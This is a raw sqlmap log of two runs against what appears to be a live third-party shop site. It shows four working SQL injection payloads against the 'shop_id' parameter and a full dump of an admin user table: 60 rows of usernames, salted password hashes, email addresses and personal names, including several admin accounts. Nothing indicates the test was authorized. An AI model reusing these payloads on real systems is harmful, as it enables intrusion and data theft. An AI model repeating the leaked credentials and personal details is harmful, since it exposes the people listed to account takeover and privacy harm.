         _
 ___ ___| |_____ ___ ___  {1.0-dev-8d1e1ea}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 03:31:38

[03:31:38] [INFO] resuming back-end DBMS 'mysql'
[03:31:38] [INFO] testing connection to the target URL
[03:31:41] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: shop_id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: shop_id=7001 RLIKE (SELECT (CASE WHEN (3560=3560) THEN 7001 ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: shop_id=7001 AND (SELECT 4545 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(4545=4545,1))),0x716b627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: shop_id=7001 AND SLEEP(5)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 23 columns
    Payload: shop_id=7001 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71627a7671,0x4961756643454350484c7979767a444b69494178496e6241536b70656a456b4e64486d6d6854766f,0x716b627071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[03:31:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
[03:31:44] [INFO] fetching columns for table 'cmo_admin_user' in database 'jusco_union'
[03:31:49] [WARNING] reflective value(s) found and filtering out
Database: jusco_union
Table: cmo_admin_user
[21 columns]
+--------------+-----------------------+
| Column       | Type                  |
+--------------+-----------------------+
| action_list  | text                  |
| ad_info      | text                  |
| add_time     | int(11)               |
| agency_id    | smallint(5) unsigned  |
| cn_name      | varchar(50)           |
| depart_id    | varchar(255)          |
| ec_salt      | varchar(10)           |
| email        | varchar(60)           |
| is_admin     | smallint(1)           |
| lang_type    | varchar(50)           |
| last_ip      | varchar(15)           |
| last_login   | int(11)               |
| nav_list     | text                  |
| password     | varchar(32)           |
| role_id      | smallint(5)           |
| shop_id      | mediumint(4) unsigned |
| suppliers_id | smallint(5) unsigned  |
| todolist     | longtext              |
| true_name    | varchar(50)           |
| user_id      | smallint(5) unsigned  |
| user_name    | varchar(60)           |
+--------------+-----------------------+

[03:31:49] [INFO] fetched data logged to text files under '/home/nitrous/.sqlmap/output/eshop.qdaeon.com'

[*] shutting down at 03:31:49

         _
 ___ ___| |_____ ___ ___  {1.0-dev-8d1e1ea}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 03:34:50

[03:34:50] [INFO] resuming back-end DBMS 'mysql'
[03:34:50] [INFO] testing connection to the target URL
[03:34:53] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: shop_id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: shop_id=7001 RLIKE (SELECT (CASE WHEN (3560=3560) THEN 7001 ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: shop_id=7001 AND (SELECT 4545 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(4545=4545,1))),0x716b627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: shop_id=7001 AND SLEEP(5)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 23 columns
    Payload: shop_id=7001 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71627a7671,0x4961756643454350484c7979767a444b69494178496e6241536b70656a456b4e64486d6d6854766f,0x716b627071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[03:34:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
[03:34:55] [INFO] fetching entries of column(s) 'cn_name, ec_salt, email, is_admin, password, role_id, user_name' for table 'cmo_admin_user' in database 'jusco_union'
[03:35:00] [WARNING] reflective value(s) found and filtering out
[03:35:00] [INFO] analyzing table dump for possible password hashes
[03:35:00] [INFO] recognized possible password hashes in column 'password'

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q] Database: jusco_union
Table: cmo_admin_user
[60 entries]
+------------+----------------------------------+----------+---------+-------------------------+---------+---------+
| user_name  | password                         | is_admin | ec_salt | email                   | cn_name | role_id |
+------------+----------------------------------+----------+---------+-------------------------+---------+---------+
| admin      | e0b2dc45b6e3b8d626c09baa3e30a37c | 1        | 3069    | admin@qdaeon.com        | 刘更新     | 0       |
| 2012053539 | e1ebfab7d8e5a5455081203cbd8d454d | 0        | 1562    | sx@qdaeon.com           | 孙霞      | 0       |
| 09002320   | 622d2157b1c0eef9e49e470fbbdc673e | 0        | 1308    | <blank>                 | <blank> | 0       |
| 2008051443 | d414711246ab959bb95b424a74c2c91e | 0        | 3972    | mqz@qdaeon.com          | <blank> | 14      |
| 2011102977 | eba713639858dfc6664c7a30de4475c2 | 0        | 4114    | wfh@qdaeon.com          | 王福慧     | 0       |
| 15000309   | df45ba66398e8ec7bcec45f8b9ca17be | 0        | 6091    | <blank>                 | <blank> | 14      |
| 14005944   | abc3cc96032d3065a45826f10687f1bb | 0        | 619     | <blank>                 | <blank> | 0       |
| 2012073626 | b4b08d491477d09ea4c5123cd1333d87 | 0        | 3724    | liuchao4444444@126.com  | <blank> | 0       |
| 1999090725 | 12d4816cd4eb9ac073921a4089520b7d | 0        | 1771    | <blank>                 | <blank> | 0       |
| 2011082882 | 73dd09ddd30a7201572b1bd293dbe3ab | 0        | 6784    | lp@qdaeon.com           | 刘鹏      | 0       |
| 2002010998 | 66309957f846caedf7d121fdd25acaea | 0        | 7539    | cxl@qdaeon.com          | 曹晓丽     | 0       |
| 1998080578 | 100d7af7ac5ebec115c1dd30e77f94cd | 0        | 6998    | <blank>                 | <blank> | 12      |
| 2011103022 | 7b37a0e2b6882ab421e13024b136326f | 0        | 6225    | lj@qdaeon.com           | <blank> | 14      |
| 2008071535 | 8a70761036d8471db16d241a92915a68 | 0        | 58      | shp@qdaeon.com          | <blank> | 15      |
| 2010000064 | f897ecad3c584806c6e92ddd0a9f42a3 | 0        | 2111    | zdw@qdaeon.com          | <blank> | 16      |
| 2010000434 | 73cd9f6ce8dc7784300581a0932c309a | 0        | 8534    | hht@qdaeon.com          | <blank> | 16      |
| 2010092566 | b4770cb56ecc2d7b74ecddeb4f01ac54 | 0        | 3770    | <blank>                 | <blank> | 0       |
| 2010000051 | 7480c966ebcf83fa844fa8f505b3fa66 | 0        | 4694    | gxy@qdaeon.com          | <blank> | 20      |
| 2010000230 | e817424bebfd97c5edb56f637d20ad23 | 0        | 5094    | <blank>                 | <blank> | 20      |
| 2012033444 | c2ff70a9d80751d3b8c11a4d8420ff99 | 0        | 8658    | <blank>                 | <blank> | 0       |
| 2008000118 | f936d2e7d5b8aed82cd87a138df4fbd0 | 0        | 3344    | <blank>                 | <blank> | 15      |
| 2007091386 | bc741c37090d183ae2e4274f29976276 | 0        | 2027    | yteshop@qdaeon.com      | <blank> | 0       |
| xiangenli  | ccf4a125edb3e461f84fb84493731d42 | 1        | 9834    | <blank>                 | <blank> | 0       |
| wyl073     | e35d16204bf52bead9c1d5c4f7d0d9c6 | 1        | 8619    | wyl072@qq.com           | <blank> | 0       |
| 2010011954 | 6e7789222c329f53543232ed0aac17c3 | 0        | 1784    | <blank>                 | <blank> | 20      |
| 2010000193 | 41eff23673947e881f4b4b2254266cb7 | 0        | 7963    | winlxp@qq.com           | <blank> | 16      |
| 1997120367 | 8406353e4c7122cdece80eadf76abaee | 1        | 757     | eclq@qdaeon.com         | <blank> | 0       |
| 97000136   | 2a54110f9509090ca4b1b744a5e37866 | 1        | 445     | wht@qdaeon.com          | <blank> | 0       |
| 1998040475 | 0b79d1f14490aaa88990496797639d30 | 1        | 8355    | ecdhx@qdaeon.com        | <blank> | 0       |
| 97110144   | df8313c42a8a382573a7db0b20247699 | 1        | 3892    | <blank>                 | <blank> | 0       |
| 08002493   | d96c4054e10041cc84665cef2f5cf2d5 | 0        | 8040    | <blank>                 | <blank> | 18      |
| 00000131   | 60d0b711a19032b68489fd898a4c2c79 | 1        | 764     | chenqiang@qdaeon.com    | <blank> | 0       |
| 2000010755 | 63d4795d8101426cac9378ff1974ef78 | 1        | 5130    | eclx@qdaeon.com         | <blank> | 0       |
| 2008121743 | 3ac83088ac15a55bea7fe1d15fa8ff49 | 1        | 5635    | eclyw@qdaeon.com        | <blank> | 0       |
| 2010082263 | f44750e36b22dba7c0ff90af9a660cbe | 1        | 9956    | <blank>                 | <blank> | 0       |
| 2010092532 | 1ff3af307ccd8f432f967bd9a41521d8 | 1        | 6070    | ecljn@qdaeon.com        | <blank> | 0       |
| 2010082265 | 216c0d19e7735755528ab0cc40ec34a6 | 1        | 9299    | eclbq@qdaeon.com        | <blank> | 0       |
| 2012093716 | 86aaa2faa5396edfd10f8b0db61aa5f7 | 0        | 6759    | <blank>                 | <blank> | 0       |
| liutao     | d03e09c86ccee6e9199e9eb3ee0a2ca0 | 1        | 5894    | liutao@east-net.cn      | <blank> | 0       |
| 2002010971 | bf3afadc87e139559184f3a9ab53522c | 1        | 3801    | <blank>                 | <blank> | 0       |
| 1999000017 | 543c983a508ae8ab6c32298bb762694a | 1        | 5297    | <blank>                 | <blank> | 0       |
| wyl7001    | d295420d581f545a5eea6836e4392fd2 | 0        | 6001    | wyl072@qqq.com          | <blank> | 0       |
| blkjs      | b023c9e9a592be136b85c2e2b0bc3b99 | 0        | <blank> | <blank>                 | <blank> | 0       |
| 2012113779 | 529ff2b565eb721868b3d99086b2ff84 | 1        | 8176    | ecwangyang@qdaeon.com   | <blank> | 0       |
| bbsp       | 06c5d7dfdfebb164f9a8789201bd5d29 | 1        | 2657    | bbsp@qdaeon.com         | <blank> | 0       |
| wyl072     | b37b9b964cd7bdd35097460d6d9fd76c | 1        | 9050    | 1508222222@qq.com       | <blank> | 0       |
| 2008000347 | a30e7a095d1b6f23a33d587f58f538d4 | 0        | 8187    | wanghong@qdaeon.com     | <blank> | 0       |
| 2008000342 | 675f40328c882a7369368aa345a24874 | 0        | 5594    | wangxiaoting@qdaeon.com | <blank> | 17      |
| ytkjs      | aad735bca0b8d89c4638963027ce5193 | 0        | <blank> | <blank>                 | <blank> | 0       |
| 14007936   | bc9f25d343f7e8e0a945313f48863a78 | 0        | 3829    | <blank>                 | <blank> | 0       |
| whkjs      | 8e973ca318204ab4e7eddfd8b0a1a445 | 0        | <blank> | <blank>                 | <blank> | 0       |
| 2009081912 | 708f6ee0f460d404b6e4cc27c23b6995 | 1        | 8942    | mxf@qdaeon.com          | <blank> | 0       |
| 14207933   | 0b27e23e74adc7e3f21cec75047ebd4f | 0        | <blank> | <blank>                 | <blank> | 14      |
| 2010000210 | c8bb43845d0fb7c8541834096fdd54b7 | 0        | 4009    | 417131946@qq.com        | <blank> | 0       |
| 14006270   | 4460e6de5954e7c8991df4a3e9b8ee4a | 0        | 602     | <blank>                 | <blank> | 14      |
| 2006091267 | 629a0de4dd2b13e338d772d7bf18b03e | 0        | 3455    | <blank>                 | <blank> | 0       |
| 2011123362 | f70a464bd8e1cecff1f1b3f475211c7f | 0        | 8958    | <blank>                 | <blank> | 0       |
| 2010000295 | f3a6936a7bd694e1824a9f6d3ba265bd | 0        | 5262    | <blank>                 | <blank> | 0       |
| 2010031966 | 3df411210824a48c15cc047602bc07fe | 0        | 6995    | <blank>                 | <blank> | 12      |
| 10004277   | f1d55a916b1ebf621fe78cb3a81ebe87 | 0        | 907     | whhht@qdaeon.com        | <blank> | 0       |
+------------+----------------------------------+----------+---------+-------------------------+---------+---------+

[03:35:36] [INFO] table 'jusco_union.cmo_admin_user' dumped to CSV file '/home/nitrous/.sqlmap/output/eshop.qdaeon.com/dump/jusco_union/cmo_admin_user.csv'
[03:35:36] [INFO] fetched data logged to text files under '/home/nitrous/.sqlmap/output/eshop.qdaeon.com'

[*] shutting down at 03:35:36

